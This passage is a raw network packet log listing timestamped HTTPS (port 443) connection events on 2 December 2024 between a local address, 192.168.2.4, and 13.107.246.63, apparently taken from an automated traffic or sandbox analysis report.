                                                          Dec 2, 2024 17:57:44.372236967 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.372324944 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.372649908 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.372665882 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.653799057 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.654306889 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.654329062 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.654874086 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.654879093 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.984850883 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.985264063 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.985296965 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.985755920 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.985761881 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.119854927 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.122906923 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.122961998 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.123047113 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.123064995 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.123075962 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.123080969 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.125946999 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.125987053 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.126049042 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.126283884 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.126298904 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.352626085 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.353144884 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.353173018 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.353595972 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.353601933 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.432881117 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.436053991 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.436126947 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.436175108 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.436192989 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.436202049 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.436208010 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.438954115 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.439001083 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.439093113 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.439260960 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.439275980 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.797416925 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.800228119 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.800326109 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.800364017 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.800384045 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.800394058 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.800400019 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.803303957 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.803349972 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:45.803426027 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.803612947 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:45.803625107 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.010476112 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.014029026 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.014056921 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.014493942 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.014501095 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.154134035 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.154663086 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.154700041 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.155148983 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.155155897 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.456631899 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.459547043 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.459594965 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.459602118 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.459650040 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.459697008 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.459713936 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.459724903 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.459732056 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.462445021 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.462486029 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.462558985 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.462690115 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.462704897 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.615577936 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.615648031 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.615704060 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.615873098 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.615890980 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.615909100 CET49990443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.615914106 CET4434999013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.618782043 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.618818998 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.618911028 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.619076967 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.619088888 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.940556049 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.941296101 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.941324949 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:46.941890001 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:46.941896915 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.301176071 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.301820993 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.301852942 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.302202940 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.302207947 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.398715973 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.398766041 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.398842096 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.398844957 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.398889065 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.399117947 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.399138927 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.399152994 CET49991443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.399158955 CET4434999113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.402055979 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.402089119 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.402170897 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.402352095 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.402364969 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.684763908 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.685333014 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.685372114 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.685662985 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.685667992 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.756424904 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.759378910 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.759587049 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.759587049 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.759587049 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.762031078 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.762070894 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:47.762156010 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.762295961 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:47.762307882 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.073640108 CET49992443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.073676109 CET4434999213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.138641119 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.141814947 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.141863108 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.141896963 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.141931057 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.141989946 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.142008066 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.142025948 CET49993443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.142030954 CET4434999313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.144736052 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.144781113 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.144855022 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.144988060 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.145003080 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.317305088 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.317853928 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.317876101 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.318500996 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.318506956 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.467636108 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.468197107 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.468244076 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.468652964 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.468661070 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.775639057 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.782176018 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.782269001 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.782376051 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.782391071 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.782406092 CET49994443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.782412052 CET4434999413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.785691977 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.785737991 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.785815001 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.785937071 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.785957098 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.921334982 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.924763918 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.924849033 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.924880981 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.924897909 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.924909115 CET49995443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.924913883 CET4434999513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.927889109 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.927911997 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:48.927966118 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.928518057 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:48.928529024 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.184655905 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.185219049 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.185254097 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.185676098 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.185679913 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.614000082 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.614501953 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.614531040 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.614984989 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.614989996 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.631220102 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.633975983 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.634062052 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.634105921 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.634105921 CET49996443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.634125948 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.634135008 CET4434999613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.636717081 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.636761904 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.636867046 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.637008905 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.637023926 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.998780966 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.999352932 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.999386072 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:49.999835014 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:49.999840021 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.067271948 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.070802927 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.070858002 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.070864916 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.070916891 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.071002007 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.071023941 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.071033955 CET49997443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.071041107 CET4434999713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.073360920 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.073398113 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.073471069 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.073596954 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.073609114 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.452377081 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.455575943 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.455651999 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.457695007 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.457715034 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.457726002 CET49998443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.457731009 CET4434999813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.499342918 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.499385118 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.499459028 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.499604940 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.499619007 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.570763111 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.571343899 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.571383953 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.571810961 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.571815968 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.711702108 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.712340117 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.712363005 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:50.713062048 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:50.713068008 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.019320965 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.022706032 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.022764921 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.022804022 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.022821903 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.022830963 CET49999443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.022835970 CET4434999913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.025851965 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.025875092 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.025939941 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.026125908 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.026139021 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.155802965 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.159295082 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.159373999 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.159424067 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.159424067 CET50000443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.159446001 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.159456015 CET4435000013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.162081003 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.162132025 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.162209034 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.162388086 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.162403107 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.522191048 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.523477077 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.523504019 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.523921967 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.523927927 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.858827114 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.859446049 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.859472036 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.859896898 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.859910965 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.979959965 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.982840061 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.982902050 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.982942104 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.982959032 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.982968092 CET50001443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.982973099 CET4435000113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.985548973 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.985594034 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:51.985656023 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.985814095 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:51.985832930 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.308042049 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.311268091 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.311342001 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.311388969 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.311388969 CET50002443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.311407089 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.311420918 CET4435000213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.314167976 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.314203978 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.314286947 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.314454079 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.314467907 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.371463060 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.371884108 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.371917009 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.372298956 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.372306108 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.781574965 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.782099009 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.782120943 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.782565117 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.782569885 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.820455074 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.823796988 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.823860884 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.823914051 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.823936939 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.823950052 CET50003443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.823956013 CET4435000313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.826566935 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.826596975 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.826673031 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.826832056 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.826845884 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.966947079 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.967473030 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.967509985 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:52.967900991 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:52.967906952 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.264695883 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.267863035 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.267946005 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.267987967 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.268006086 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.268016100 CET50004443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.268021107 CET4435000413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.270600080 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.270647049 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.270723104 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.270894051 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.270909071 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.411302090 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.414736032 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.414783955 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.414797068 CET50005443192.168.2.413.107.246.63
